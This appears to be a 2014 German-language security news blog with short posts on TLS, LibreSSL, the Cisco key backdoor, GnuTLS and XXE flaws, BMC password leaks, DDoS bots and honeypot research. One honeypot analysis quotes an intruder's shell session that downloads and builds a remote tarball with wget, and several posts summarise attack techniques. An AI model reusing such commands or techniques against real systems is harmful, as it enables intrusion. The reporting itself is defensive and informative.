"It gives me great pleasure to announce that my book, Bulletproof SSL and TLS, has now been officially released. The end result is about 528 pages of text (in print; 513 in the version optimised for screen reading) spread across 16 chapters. The book is a complete package with an introduction to cryptography, SSL, TLS, and PKI, followed by a complete coverage of the current problems with the protocols as well as the entire ecosystem, and a ton of practical advice for configuration and performance tuning. " Ivan Ristic


Table of Contents

Part I: SSL/TLS and PKI

  1. SSL, TLS, and Cryptography
  2. Protocol
  3. Public Key Infrastructure
  4. Attacks against PKI
  5. HTTP and Browser Issues
  6. Implementation Issues
  7. Protocol Attacks

Part II: Deployment and Development

  1. Deployment
  2. Performance Optimization
  3. HSTS, CSP and Pinning

Part III: Practical Configuration

  1. OpenSSL Cookbook
  2. Testing with OpenSSL
  3. Configuring Apache
  4. Configuring Java and Tomcat
  5. Configuring Microsoft Windows and IIS
  6. Configuring Nginx

Referenzen




Spamhaus blacklistet GMX und 1&1 (Update)

2014.08.15


Spamhaus hat ausgehende Mailserver von GMX sowie 1&1 (mout.gmx.de / 212.227.15.18 ff, mout.kundenserver.de / 212.227.17.24 ) auf die Blacklist gesetzt; anscheinend liegt der Fehler im einen originären Blacklisting via abuseat.org, das von der Spamhaus-XBL übernommen wird.

Das Spamhaus-Listing ist in der Nacht vom 14. auf den 15.08. erfolgt.

Einer der Mailprovider, der momentan davon betroffen ist, ist Domainfactory, da die Spamhaus-XBL zur Spamfilterung benutzt werden; Domainfactory empfiehlt als temporäeren Workaround, die Spamfilterung für die Postfächer zu deaktivieren.


IP Address 212.227.15.19 is listed in the CBL. It appears to be infected with a spam sending trojan, proxy or some other form of botnet.

It was last detected at 2014-08-14 15:00 GMT (+/- 30 minutes), approximately 15 hours, 30 minutes ago.

Folgende Fehlermeldung erhalten GMX-Kunden, die Mails via SMTP an ein von Spamhaus geschütztes Mailsystem senden wollen:

A message that you sent could not be delivered to one or more of
its recipients. This is a permanent error. The following address
failed:

"nospam@mare-system.de":
SMTP error from remote server in greeting:
host: mxlb.ispgateway.de:
IP 212.227.15.19 is blacklisted (xbl.spamhaus.org). Help at/Hilfe unter
www.mfaq.info



LibreSSL Portable veröffentlicht (Update)

2014.07.12

  • 2014-07-15 - erste Analysen verfügbar
  • 2014-07-13 - das 2te Release ist verfügbar

In einer Mail an die OpenBSD - ML hat Bob Beck das erste Release von LibreSSL Portable verkündet; LibreSSL steht damit ab sofort für OpenBSD, Linux, OSX, Solaris und FreeBSD zur Verfügung:

Notice First Release

The first release of LibreSSL portable has been released. LibreSSL
can be found in the LibreSSL directory of your favorite OpenBSD mirror.

http://ftp.openbsd.org/pub/OpenBSD/LibreSSL has it, and other mirrors
will soon.

libressl-2.0.0.tar.gz has been tested to build on various versions of
Linux, Solaris, Mac OSX, and FreeBSD.

This is intended as an initial release to allow the community to start
using and providing feedback. We will be adding support for
other platforms as time and resources permit.

As always, donations (http://www.openbsdfoundation.org/donations.html)
are appreciated to assist in our efforts.

Enjoy,

-Bob

Notice 2nd Release

We have released an update, LibreSSL 2.0.1

This release includes a number of portability fixes based on the
initial feedback we have received from the community.  This includes
among other things two new configure options to set OPENSSLDIR and
ENGINESDIR. We have removed a few hardcoded compiler options that
were problematic on some systems as well as -Werror. We have also
re-synced with the latest OpenBSD sources as a number of issues
were fixed upstream. This release also includes pkg-config support.

As noted before, we welcome feedback from the broader community.

Also starting with this release the directory includes SHA256
signatures which are signed using signify.

The signify public key for libressl is:

untrusted comment: LibreSSL Portable public key
RWQg/nutTVqCUVUw8OhyHt9n51IC8mdQRd1b93dOyVrwtIXmMI+dtGFe   

Enjoy,
-Bob

Erste Analysen

Andrew Ayer hat die erste Crypto-Analyse vorgenommen und kommt zu dem Schluss:

"After testing and examining the codebase, my feedback is that the LibreSSL PRNG is not robust on Linux and is less safe than the OpenSSL PRNG that it replaced."

Weitere Details und Diskussionen siehe Links in den Referenzen (reddit, hackernews)

Referenzen




AES timing attacks on OpenSSL

2014.07.03

TL;DR:

  • You did not answer my original question, is AES in OpenSSL affected?
  • In short, no.

(weitere Infos nach detaillierter Analyse des Artikels und weitere Quellen, die momentan ausgewertet werden)

Referenzen




Enterprise, my ass: Backdoor in Ciscos Unified Communications Domain Manager

2014.07.03

Cisco hat in einem Advisory davor gewarnt, dass Unified Communications - Installation durch einen hinterlegten SSH-Key von Dritten übernommen werden und diese dann Rootrechte damit erlangen können.

Neben diesem Fauxpas Nr 1 hat Cisco sich noch einen 2ten geleistet: Nicht nur der Public-Key ist auf den Systemen hinterlegt, sondern auch der Private-Key; im Klartext heisst dies: alle Besitzer eines Ciscos Unified Communications - Systems sind im Besitz des Private-Key und können damit unberechtigt Zugriff auf weitere Installationen erlangen m(

lolwut

Referenzen




Virus Bulletin celebrates 25th birthday by making all content free

2014.07.01

Zum 25. Geburtstag von VirusBulletin haben die Macher entschieden, zukünftige Inhalte frei zur Verfügung zu stellen:

As of today, all content published in Virus Bulletin will become freely available - not only do you no longer need a subscription, you don't even need to be a registered user on our website to access the content.

happy birthday, virusbulletin

Referenzen




No more Microsoft advisory email notifications (Update)

2014.06.30

Update 1 / 2014-07-01:

Wie Larry Seltzer von ZDNet berichtet, hat Microsoft die Strategie noch einmal überdacht:

On June 27, 2014, Microsoft notified customers that we were suspending Microsoft Security Notifications due to changing governmental policies concerning the issuance of automated electronic messaging. We have reviewed our processes and will resume these security notifications with our monthly Advanced Notification Service (ANS) on July 3, 2014

via SANS ISC:

********************************************************************
 Title: Microsoft Security Notifications
 Issued: June 27, 2014
********************************************************************

Notice to IT professionals:

As of July 1, 2014, due to changing governmental policies concerning the issuance of automated electronic messaging, Microsoft is suspending the use of email notifications that announce the following:

* Security bulletin advance notifications
 * Security bulletin summaries
 * New security advisories and bulletins
 * Major and minor revisions to security advisories and bulletins

In lieu of email notifications, you can subscribe to one or more of the RSS feeds described on the Security TechCenter website. 

For more information, or to sign up for an RSS feed, visit the Microsoft Technical Security Notifications webpage at http://technet.microsoft.com/security/dd252948

Referenzen




Chrome: Weltherrschaft in 5 Jahren

2014.06.28

Russel Beattie hat via Twitter ein kurzes, aus StatsCounter-Daten zusammengesetztes Video veröffentlicht, indem er zeigt, wie sich die weltweite Browserverteilung in den letzten 5 Jahren vom IE zu Firefox bis hin zur Dominanz von Google's Chrome entwickelt hat.

(click for video)

browser-stats 2


Related:


Referenzen




Identifying (and Exploiting) Xml eXternal Entity vulnerability (XXE)

2014.06.27

Philippe Arteau demonstriert in einem Video die Möglichkeit, via XML-Import und XXE eine Shell auf einem angreifbaren System ( RunKeeper.com ) zu bekommen und beliebige Befehle auszuführen.

Im dazugehörenden Artikel erläutert er ausführlich die einzelnen Schritte, die letztendlich zur Remote Code Execution führen. [1] XXE-Lücken können generell zu schwerwiegenden Sicherheitsproblemen führen; Reginaldo Silva ist es z.B. gelungen durch eine ähnliche Lücke Remote-Zugriff auf Facebook-Server zu erlangen. [2]

WAF-Regeln zum Erkennen von XXE-Angriffen stehen für Naxsi seit längerem bereit [3]


Demonstration of the attacks described previously. (Fullscreen recommended)


Referenzen

  1. Identifying Xml eXternal Entity vulnerability (XXE)
  2. XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers
  3. WAF: Naxsi-Regel gegen XXE-Exploits



SSL/TLS capabilities of 30+ widely used browsers and devices

2014.06.27

Qualys' SSLLabs veröffentlicht eine Liste der SSL-Fähigkeiten von 30 aktuelle, verbreiteten Browsern und Clients:

ssl-caps by clients

Referenzen




Wanna know the PWD for the Brasil world cup security center WiFi Network?

2014.06.25

It's on the whiteboard!

brazil-wifi

via: @apbarros




Realtime Attack-Map (Norse)

2014.06.25

Nach Arborsert im letzten Herbst stellt nun auch Norse grafisch animierte Livedaten zur Verfügung, die einen Einblick in aktuelle Angriffsdaten liefern. Neben DDOS-Attacken werden auf der Karte zusätzlich Brute-Force-Versuche (SSH, RDP u.a.) und Angriffe auf Webapplikationen dargestellt.

norse

Referenzen




History theft with CSS Boolean algebra

2014.06.24

Michal Zalewski, aka lcamtuf:

"OK, this is more fun than any immediate risk...

Those of you who follow web security topics probably remember that
until mid-2010, you could extract very substantial chunks of one's
browsing history by applying distinctive styling to thousands of
off-screen :visited links and then reading that information back
through the getComputedStyle API or in a couple of related ways.

This loophole has been closed by making it practically impossible to
programmatically measure any side effects of the styling applied to
:visited links (spare for some relatively wonky redraw timing
attacks). The information could be read back only with user's
assistance, which seemed much less interesting for two reasons:

1) It is relatively difficult to come up with really compelling,
casual interactions where the user would unwittingly divulge styling
information on specially prepared links to a rogue website,

2) Even if you could come up with such an attack, you would be limited
to probing roughly one visited link per click, so the throughput would
be very low.

Few months ago, I published a whimsical PoC showing that the first
assumption may be somewhat short-sighted. True to my lifelong dream of
becoming a fabulously wealthy game developer, I created this
low-grade, knock-off version of Asteroids:

http://lcamtuf.coredump.cx/yahh/

Today, I wanted to show an equally silly but less entertaining
proof-of-concept that touches on the latter topic. The PoC shows how
to measure the state of multiple links - possibly a dozen or so - with
a single casual click:

http://lcamtuf.coredump.cx/css_calc/

The PoC is based on carefully constructing Boolean operators with the
extremely rudimentary subset of CSS permitted for :visited links. I
don't want to spoil it all, but you can pull it off in a somewhat
funny way. There is no game included; I was going to have a logo for
this vulnerability instead, but my publicist didn't deliver (again).

Cheers,
/mz

Referenzen




MOD_SPDY ist offizielles Apache-Projekt

2014.06.20

Das Apache-Modul mod_spdy, bisher von Google entwickelt, ist an die Apache-Foundation übergeben worden, wird damit integraler Bestandteil des Apache-Webservers 2.4 und soll ab der 2.6er-Version eines der Core-Features werden.

Aus der Ankündigung im Google-Developers Blog:

We’re pleased to announce that Google has formally donated mod_spdy’s code to the Apache Software Foundation, and it is now a part of the Apache httpd codebase.

"The intent is to work on making it fully part of [Apache] 2.4 and, of course, a core part of 2.6/3.0" - Jim Jagielski, co-founder of the ASF.

Das von Google entwickelte SPDY-Protokoll wird als heißer Kandidat für die Version 2 des HTTP-Protokolls gehandelt und ist, neben Apache, auch für Nginx verfügbar.

Referenzen




GET /passwords.txt - 200 OK: 32.000 Server durch BMC-Lücke gefährdet

2014.06.20

Zachary Wikholm hat eine erneute Schwachstelle in der BMC-Implementierung von Supermicro-Servern gefunden: nach seinen Angaben ist es möglich, die Zugangspasswörter im Klartext über eine einfache GET-Anfrage via Port 49152 zu erhalten; einem Scan durch Shodan zufolge antworten mehr als 9 Millionen Server auf diese Anfrage, wobei sich die Passwort-Datei in 32.000 Fällen herunterladen ließ.

This means at the point of this writing, there are 31,964 systems that have their passwords available on the open market. It gets a bit scarier when you review some of the password statistics. Out of those passwords, 3296 are the default combination. Since I’m not comfortable providing too much password information, I will just say that there exists a subset of this data that either contains or just was "password".

Referenzen




Speicher-Fallout: Verhalten verteilter Datenbanken bei Netz/Node-Ausfällen (Elasticsearch, etcd, Consul, RabbitMQ, Redis, Cassandra, NuoDB, Kafka, MongoDB, Postgres)

2014.06.20

Kyle Kingsbury beschreibt in einer Reihe von Artikeln das Verhalten unterschiedlicher, verteilter Datenbanken unter Last oder teilweisem Netz/Node-Ausfall. Inbesondere werden Replikation, Fehlertoleranz, Daten-Konsistenz und potentieller Datenverlust untersucht.


the game




PoC for Docker VMM-container breakout

2014.06.18

Ein Statement des Maintainers:

Hi all, I'm a maintainer of Docker. As others already indicated this doesn't work on 1.0. But it could have. Please remember that at this time, we don't claim Docker out-of-the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "pfew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add apparmor or selinux containment, map trust groups to separate machines, or ideally don't grant root access to the application. Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet! When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly.

Referenzen




Online-Tests for the latest and greates OpenSSL-Vulns (en)

2014.06.15

There are various online-services available, checking for the latest and greatest OpenSSL-Vulns like Early ChangeCipherSpec Attack (CVE-2014-0224) on webservers:

  • SSLLabs implemented the CCS-test already in their development-version
  • ccsbug.exposed is a Test created by NCCGroup
  • 8ack.de SSLScan is a service, testing for Heartbleed (CVE-2014-0160) and CCS-Vuln

Remarks: all tests schould be considered experimental; we had issues where we couldnt generate reliable scan-results for one definetly fixed server with tools linked above; rule of thumb: if you use only distro-packages and are sure your systems are updated and services restarted. YMMV


CCS-Test @ 8ack.de

sslscan @ 8ack.de


sslscan @ 8ack.de




Online-Tests für OpenSSL-Lücken

2014.06.11

Für die letzte Woche veröffentlichten, neuen OpenSSL-Lücken gibt es mittlerweile Online-Dienste und ein Testscript, mit denen man öffentlich erreichbare Server testen kann:

  • SSLLabs hat den Check der CCS-Lücke in der Entwickler-Version unter dev.ssllabs.com bereits implementiert
  • ccsbug.exposed, Test der NCCGroup auf die CCS-Lücke
  • 8ack.de - SSLScan von 8ack.de, testet auf Heartbleed (CVE-2014-0160) und CCS-Lücke (CVE-2014-0224)

Anmerkung: Momentan sind alle Testverfahren experimentell, funktionieren nur gegen Webserver und können sowohl False Postives als auch False Negatives produzieren; ein Fall ist bekannt, bei dem sowohl positive als auch negative Resultate für den gleichen Server mit dem gleichen oder unterschiedlichen Tools erzeugt wurden; als Daumenregel kann gelten: Wenn die Distributionspakete benutzt werden, Updates eingespielt und die entsprechenden Dienste neu gestartet wurden, sollte der Server sicher sein. YMMV


CCS-Test @ 8ack.de

sslscan @ 8ack.de


sslscan @ 8ack.de




One Token to Rule Them All - The Tale of the Leaked Gmail Addresses

2014.06.10

Oren Hafif von Spiderlabs hat einen Weg gefunden, durch Token-Fuzzing alle Gmail-Adressen, inklusive der Business-Accounts zu extrahieren.

Aus dem Blog:

Short Version
I really think that you'll enjoy this blog, however, for those of you who can't take 5 minutes to read it, here is a one-liner:
I bruteforced a token in a Gmail URL to extract all of email addresses hosted on Google.

gmail-by-tokens

In einem weiteren Artikel (From a Username to Full Account Takeover) erklärt er, wie Email-Adressen und Telefonnummern mittlerweile mit Online-Identitäten verknüpft sind und welche Informationen und Angriffsmöglichkeiten Hackern bieten, wenn Sie Zugriff auf diese Daten haben: Spear-Phisihing, Angriffe auf Applikationen und Übernahme von Accounts, Beschädigung der Reputation.

Summary
Usernames, email addresses and phone numbers are invaluable pieces of information for attackers. They can be used in a large variety of attacks which in some cases result in full account takeover.

When it comes to username leakage – size matters. The bigger the list of exposed username the more damage can be done by a malicious entity.

Zu den Auswirkungen einer feindlichen Account-Übernahme hat Mat Honan, Editor beim Wired-Magazin offen Auskunft gegeben: Wie eine digitale Existenz in 30 Minuten ausgelöscht werden kann

Referenzen




Technical Analysis Of The GnuTLS Hello Vulnerability (CVE-2014-3466)

2014.06.05

Die Entwickler der GnuTLS-Library haben ein Advisory veröffentlicht, in dem sie vor eine Lücke warnen, die hauptsächlich Clients betrifft und zu Remote Code Execution auf Clientseite führen kann; Updates stehen bereit: [1]

This vulnerability affects the client side of the gnutls library. A server that sends a specially crafted ServerHello could corrupt the memory of a requesting client. Recommendation: Upgrade to the latest gnutls version (3.1.25, 3.2.15 or 3.3.4)

In einem umfangreichen Artikel, dem wir schamlos den Titel gecloud haben, erläutert pancake von radare.info die technischen Hintergründe der Lücke: Technical Analysis Of The GnuTLS Hello Vulnerability / by radare.today; ein POC steht bereit [3],

Auswirkungen

GnuTLS wird von einer Vielzahl Clients genutzt (siehe Liste weiter unten); die Lücke führt zu einer Memory Corruption und ggfs zu Remote Code Execution auf Clientseite. Den unter [3] angebotenen POC konnten wir erfolgreich nur mit dem gtnutls-cli - Tools testen konnten; wget scheint anfällig zu sein und stürzt mit einem SegFault ab, curl scheint nicht anfällig zu sein, zumindest wird ein Fehler erkannt und das Programm mit einer Fehlermeldung beendet.

[ sunny@sunday247 :~] > wget https://localhost:12345/
--2014-06-05 10:07:04--  https://127.0.0.1:12345/
Connecting to 127.0.0.1:12345... connected.
GnuTLS: No supported cipher suites have been found.
Segmentation fault

[ sunny@sunday247  :~] > curl -k https://localhost:12345/
curl: (35) error:1409212C:SSL routines:SSL3_GET_SERVER_HELLO:ssl3 session id too long

Mitigations & Workarounds

Workarounds sind nicht bekannt; Updates stehen für RedHat zur Verfügung, für Debian werden Updates für heute, spätestens morgen erwartet, für SLES sind keine Informationen verfügbar [4,5]

Liste der Programme, die GnuTLS benutzen (Debian):

# apt-cache rdepends libgnutls26 | grep -v lib
Reverse Depends:
  telepathy-gabble
  qemu-kvm
  guile-gnutls
  gnutls-bin
  xxxterm
  xpp
  xfprint4
  xfce4-mailwatch-plugin
  xen-utils-4.1
  x11vnc
  wzdftpd-mod-tcl
  wzdftpd-mod-perl
  wzdftpd-back-pgsql
  wzdftpd-back-mysql
  wzdftpd
  wmbiff
  wget
  weechat-curses
  weechat-core
  webfs
  vpnc
  vlc-nox
  vino
  ucommon-utils
  totem-plugins
  telepathy-salut
  telepathy-gabble
  tdsodbc
  suricata
  sogo
  snort-pgsql
  snort-mysql
  snort
  slapd
  sipwitch-cgi
  sipwitch
  sipsak
  shishi-kdc
  shishi
  shisa
  scrollz
  samhain
  rtmpdump
  rsyslog-gnutls
  qpdfview
  qemu-system-x86
  qemu-system-sparc
  qemu-system-ppc
  qemu-system-misc
  qemu-system-mips
  qemu-system-arm
  python-pycurl-dbg
  python-pycurl
  python-preludedb
  python-prelude
  python-mailutils
  python-gtk-vnc
  python-gnutls
  proxytunnel
  printer-driver-gutenprint
  prelude-manager
  prelude-lml
  postal
  pianobar
  passing-the-hash
  pacemaker
  openvas-scanner
  openvas-manager
  openvas-cli
  openvas-administrator
  nzbget
  nullmailer
  ntfs-3g
  ngircd
  newsbeuter
  network-manager
  netatalk
  nautilus-sendto-empathy
  mutt-patched
  mutt
  msmtp-gnome
  msmtp
  mpop-gnome
  mpop
  mozilla-gtk-vnc
  minbif
  mandos-client
  mailutils-pop3d
  mailutils-mh
  mailutils-imap4d
  mailutils-comsatd
  mailutils
  macopix-gtk2
  lynx-cur
  linuxvnc
  lftp
  ldap-utils
  kildclient
  jd
  ircd-ratbox
  inspircd
  infinoted
  heartbeat
  gvncviewer
  gurlchecker
  guile-gnutls
  gtklp
  gtk-gnutella
  gsd
  gsasl
  greenbone-security-assistant
  gobby-0.5
  gnutls-bin
  gnu-smalltalk
  gnomint
  gnome-settings-daemon
  gnome-control-center
  gkrellm
  ghostscript-cups
  freetds-bin
  filezilla
  exim4-daemon-light
  exim4-daemon-heavy
  empathy
  elinks-lite
  elinks
  ekg2-remote
  ekg2-jabber
  echoping
  dsyslog
  cups
  csync2
  connman
  claws-mail-trayicon
  claws-mail-spamassassin
  claws-mail-smime-plugin
  claws-mail-pgpmime
  claws-mail-pgpinline
  claws-mail-bogofilter
  claws-mail
  charybdis
  centerim-utf8
  centerim-fribidi
  centerim
  cairo-dock-mail-plug-in
  bitlbee
  ario
  aria2
  anubis
  aiccu
  abiword

Referenzen




Tomcat-Patches schließen diverse DOS-Lücken (CVE-2014-0075, CVE-2014-0095 )

2014.06.03

Das Tomcat-Entwicklerteam hat Patches für die Versionen 6/7/8 veröffentlicht, die diverse Lücken schließen und u.a. DOS-Angriffe ermöglichen (CVE-2014-0075, CVE-2014-0095 ).

Happy Patching!

Referenzen




A journey to abused FTP sites (story of Shells, Malware, Bots, DDoS, Spam, Cloudflare evasion)

2014.06.03

Hendrik Adrian (@unixfreaxjp) von MalwareMustDie hat sich anhand von 7 Beispielen die aktuelle PHP/Server-Bot - Szene angesehen und ein paar alte Bekannte entdeckt, die sich im Laufe der Zeit den technischen Entwicklungen angepasst haben; hatte der immernoch im Einsatz befindliche pBot vor 5 Jahren gerade mal 3 Attack-Modi (updflood, tcpflood, synflood), so sind mittlerweile 7 verschiedene Angriffsmodi bekannt, und anscheinend auch eine Möglichkeit, den Cloudflare-DDoS-Schutz zu umgehen, indem Cookies ausgelesen und gespeichert werden.

Angriffsmodi pBot 2014:

  • udpflood
  • httpflood (NEW!)
  • synflood (IMPRPOVED!)
  • slowlorrisflood (NEW!)
  • rudyflood (NEW!)
  • armeflood (NEW!)
  • cloudflareflood (NEW!)
  • tcpflood (IMPROVED)

Screenshot der Cloudflare-Mitigation:

pbot

Referenzen




The Anatomy of a Rails Vulnerability-CVE-2014-0130: From Directory Traversal to Shell

2014.05.29

Interessantes Paper von Jeff Jarmoc, indem er den Weg beschreibt, durch Ausnutzen einer Directory-Traversal-Lücke (siehe SB 14.11) letzendlich beliebige Befehle auf dem Server auszuführen (Remote Code Execution).

In this paper, we explore the attack vectors of this vulnerability, as well additional impacts beyond simple file retrieval. These include remote code execution across a variety of Ruby on Rails deployment environments. If you take away one thing, it should be this: vulnerability impact is not always clear without close review. In this case, the advisories say arbitrary file read, with a highly unusual configuration. We’ll see how to achieve remote code execution with a more common setup."

rails-exploit

Betroffene Server-Konstellationen:

rails-cve-2014-0130

Rerefenzen




TrueCrypt: Gehackt oder mundtot?

2014.05.29

truecrypt is not secure

In einem Statement geben die TrueCrypt-Macher auf ihrer Sourceforge-Seite bekannt, dass die Entwicklung von TrueCrypt im Mai 2014 beendet wurde und die Software nicht mehr als sicher anzusehen ist:

WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists only to help migrate existing data encrypted by TrueCrypt.

The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP

Diese Ankündigung sorgt für Verwirrung (siehe dazu auch die entsprechende reddit-diskussion) und nährt einige Verschwörungstheorien dahingehende, ob die Seite gehackt wurde oder ob die TrueCrypt-Macher, ähnlich dem Lavabit-Gründer, durch diese Maßnahme einen Hinweis darauf geben wollen (und eben nicht offiziell sagen dürfen), dass sie einen National Security Letter incl. Gag-order erhalten haben, der sie zu gewissen Maßnahmen/einbauen von Backdoors und vor allem zur Geheimhaltung zwingen würde.

Andere Theorien vermuten, dass die offizielle Seite / das DNS hijacked wurde und der Sourceforge-Account geknackt, immerhin gab es vor kurzem ein Problem bei Sourceforge mit dem Hinweis, man möge bitte alle Passwörter ändern.

Referenzen




Project Un1c0rn: Liste exploitbarer Server

2014.05.22

All your exploitable Services are belong to Un1c0rn: unter un1c0rn.net analysiert und indiziert das Un1c0rn-Projekt offen angreifbare Services, die externen Zugriff auf MongoDB oder schlecht geschützte MySQL/Postgres-Datenbanken anbieten. Die Un1c0rn-Datenbank lässt sich nach Tags oder Stichworten durchsuchen, momentan sind ~ 40.000 Server indiziert, Tendenz stark steigend; allein die Hälfte davon, also 20.000 Server, gewähren World&Dog Lese/Schreibzugriff auf eine MongoDB; wer mehr auf MySQL steht findet ca 2.000 MySQL-Server mit schlecht oder garnicht gesichertem Zugriff (leeres Passwort oder schwache Passwörter wie "toor, 1234, test")

Über die Motivation des Machers:

It's actually to expose what's publicly available to everyone without a
lot of effort. This project was deployed in 1 week and already has
indexed thousands of access leaked trough heart-bleed but also access to
users databases in open mongo database and mysql server.
I believe it might open some eyes seeing what some people can see since
2 years (or more).

Ein kurzer Test zeigte, dass die Ergebnisse der Un1c0rn-Suchmaschine präzise sind (siehe Screenshot); sehr verwunderlich ist, dass im Jahre 2014 immernoch Server mit komplett ungeschützten Diensten online sind.

unicorn

Links:




IETF: Ständige Überwachung ist ein Angriff / RFC 7258 / BCP 188

2014.05.21

In einem offiziellen Dokument hat die Internet Engineering Task Force (IETF) festgestellt, dass eine ständige, umfassende Überwachung als Angriff auf die Privatsphäre zu werten ist, dem die IETF durch Design und Definition der Protokolle entgegenwirken muss.

Aus dem RFC:

   Pervasive Monitoring (PM) is widespread (and often covert)
   surveillance through intrusive gathering of protocol artefacts,
   including application content, or protocol metadata such as headers.
   Active or passive wiretaps and traffic analysis, (e.g., correlation,
   timing or measuring packet sizes), or subverting the cryptographic
   keys used to secure protocols can also be used as part of pervasive
   monitoring.  PM is distinguished by being indiscriminate and very
   large scale, rather than by introducing new types of technical
   compromise.

   The IETF community's technical assessment is that PM is an attack on
   the privacy of Internet users and organisations.  The IETF community
   has expressed strong agreement that PM is an attack that needs to be
   mitigated where possible, via the design of protocols that make PM
   significantly more expensive or infeasible.  Pervasive monitoring was
   discussed at the technical plenary of the November 2013 IETF meeting
   [IETF88Plenary] and then through extensive exchanges on IETF mailing
   lists.  This document records the IETF community's consensus and
   establishes the technical nature of PM.

Referenzen




DNS Flood of 1.5 Billion Requests a Minute: When AntiDDoS - Services Attack

2014.05.18

Interessanter Artikel von Incapsula über neuartige Angriffe, die aus Netzen von Anti-DDoS - Dienstleistern stammen:

"The attack fit the description of other recently reported DNS floods, like the one that brought down UltraDNS earlier this month. With multiple reports coming from different directions, and with several large scale attacks on our own infrastructure, we are now convinced that what we are seeing here is an evolving new trend - one that can endanger even the most hardened network infrastructures.

Interestingly enough, in this case, the DNS queries contained non-spoofed IP data that allowed us to uncover the attacker’s true points of origin.

When we did, we were surprised to learn that the malicious requests were originating from servers of two other anti-DDoS service providers – one based in Canada, the other in China. All told, these were hitting our network at a rate of 1.5 Billion DNS queries a minute, amounting to over 630 Billion requests during the course of the 7 hour-long DDoS attack."

imperva-dns-ddos

Link:




Spass am Gerät: 25 Jahre alte DOS-Virussignatur in die Bitcoin-Blockchain eingepflegt

2014.05.18

O-Ton Fefe:

"Ein Scherzkeks hat einen 25 Jahre alten DOS-Virus in die Bitcoin-Blockchain eingepflegt und jetzt schlagen die ganzen "Antiviren" Alarm :-)"

Aus der Diskussion bei Microsoft:

"Earlier today, a virus signature from the virus "DOS/STONED" was uploaded into the Bitcoin blockchain, which allows small snippets of text to accompany user transactions with bitcoin. Since this is only the virus signature and not the virus itself, there apparently is no danger to users in any way. However, MSE recognizes the signature for the virus and continuously reports it as a threat, and every time it deletes the file, the bitcoin client will simply re-download the missing blockchain.

It appears to be a joke or prank, simply because this particular virus does nothing more than periodically show "YOUR COMPUTER HAS BEEN STONED" on one out of every eight computer boot-ups, and is over 25 years old."

Links:




How to Catch a Hacker in the Act

2014.05.17

Ausführlicher Artikel über ein weltweites Honeypot-Projekt von Hut3; neben Statistiken und Analysen werden Videos von Live-Einbrüchen gezeigt.

"Within seconds of the honeypots being live, attackers flocked to our dummy servers, their scanning tools quickly able to identify the vulnerable machines. Most attackers will not peruse the internet trying to identify a multitude of vulnerabilities. Instead, they will repeatedly probe with tools like Masscan for weak machines on which their devised exploits will work. This is much quicker and much more effective for launching a specific attack"

honeypot-analyse





How I bypassed 2-Factor-Authentication on Google, Facebook, Yahoo, LinkedIn, and many others.

2014.05.17

Artikel von Shubham Shah über eine sehr ausgeklügelte Methode, 2-Factor-Authentifizierung zu umgehen:

"I remember fondly two years ago, when 2-Factor-Authentication (2FA) became popular and well used across major web applications (Google, Facebook, Yahoo and others). I found, my naive sixteen year old self unable to come to terms for why the genius idea had not been thought of before. At the time, I felt that 2FA was that golden shield you could cover yourself with and defend against some of the most sophisticated phishing attacks calmly.

Whilst 2FA can still be that golden shield to the critical applications you use in your life, I shall be documenting below - using an array of exploitation methods, how I was able to bypass 2FA for Google, Facebook, Yahoo, LinkedIn and basically any service which sends 2FA tokens to voicemail."

mehr Infos




HTTP Security Headers on Top 10k Alexa Websites

2014.05.16

Security-Header-Auswertung der Alexa Top 10.000 - Websites

top-10k-headers

Mehr Infos @ paulsec.github.io

Zusätzliche Infos: Hackertarget.com stellt die Header der Top 500.000 Websites als download zur Verfügung.




Hacking the Java Debug Wire Protocol - or - "How I met your Java debugger"

2014.05.09

TL;DR: turn any open JDWP service into reliable remote code execution (exploit inside)

Mehr Infos: Hacking the Java Debug Wire Protocol - or - "How I met your Java debugger" by ioactive




Fishing for Hackers: Analysis of a Linux Server Attack

2014.05.09

In einem ausführlichen Artikel beschreibt Ginaluca Borello, wie unter Zuhilfenahme eines SSH-Honeypots und des Tools sysdig Live-Einbrüche ausgewertet werden können.

"A few days ago I stumbled upon a classic blog post covering common recommendations for hardening a fresh new Linux server: install fail2ban, disable SSH password authentication, randomize SSH port, configure iptables, etc. That got me thinking: what would happen if I did exactly the opposite? Of course the most common result is to fall victim to a botnet that is scanning a wide range of public IP addresses, hoping to find some poorly configured service to attack with brute force (SSH or Wordpress to name a few). But what actually happens when you are the victim of one of these simple attacks? What does an attacker do? This post tries to answer these questions by analyzing an actual attack on our servers, captured entirely with sysdig. So let’s go fishing!"

Ein paar Ausgaben aus dem Systemtrace:

$ sysdig -r trace.scap.gz -c topprocs_net
Bytes     Process
------------------------------
439.63M   /usr/sbin/httpd
422.29M   /usr/local/apac
5.27M     sshd
2.38M     wget
20.81KB   httpd
9.94KB    httpd
6.40KB    perl

$ sysdig -r trace.scap.gz -c topconns
Bytes     Proto     Connection
------------------------------
439.58M   udp       170.170.35.93:50978->39.115.244.150:800
422.24M   udp       170.170.35.93:55169->39.115.244.150:800
4.91M     tcp       85.60.66.5:59893->170.170.35.93:22
46.72KB   tcp       170.170.35.93:39193->162.243.147.173:3132
43.62KB   tcp       170.170.35.93:39194->162.243.147.173:3132
20.81KB   tcp       170.170.35.93:53136->198.148.91.146:6667
1000B     udp       170.170.35.93:0->39.115.244.150:800

$ sysdig -r trace.scap.gz -c spy_users
06:11:28 root) cd /usr/sbin
06:11:30 root) mkdir .shm
06:11:32 root) cd /usr/sbin/.shm
06:11:39 root) wget xxxxxxxxx.altervista.org/l.tgz
06:11:40 root) tar zxvf l.tgz
06:11:42 root) cd /usr/sbin/.shm/lib/.muh/src
06:11:43 root) /bin/bash ./configure --enable-local
06:11:56 root) make all

Mehr Infos:




OAuth/OpenID Covert Redirect: Old Bug + New FAQ

2014.05.03

An Old Bug gets some New Attenttion: OpenID Covert Redirect.

tl;dr:

Fortunately, Covert Redirect is not the next Heartbleed. In fact, from what we can ascertain, the Covert Redirect "flaw" isn't even new. Moreover, classifying Covert Redirect as a vulnerability with OAuth 2.0 and OpenID is incorrect. -- mashable.com

First of all it is a known Facebook Connect bug, other providers are not vulnerable (author claims they are?), because Connect allows you to replace response_type and redirect_uri with new values. -- egor homakov

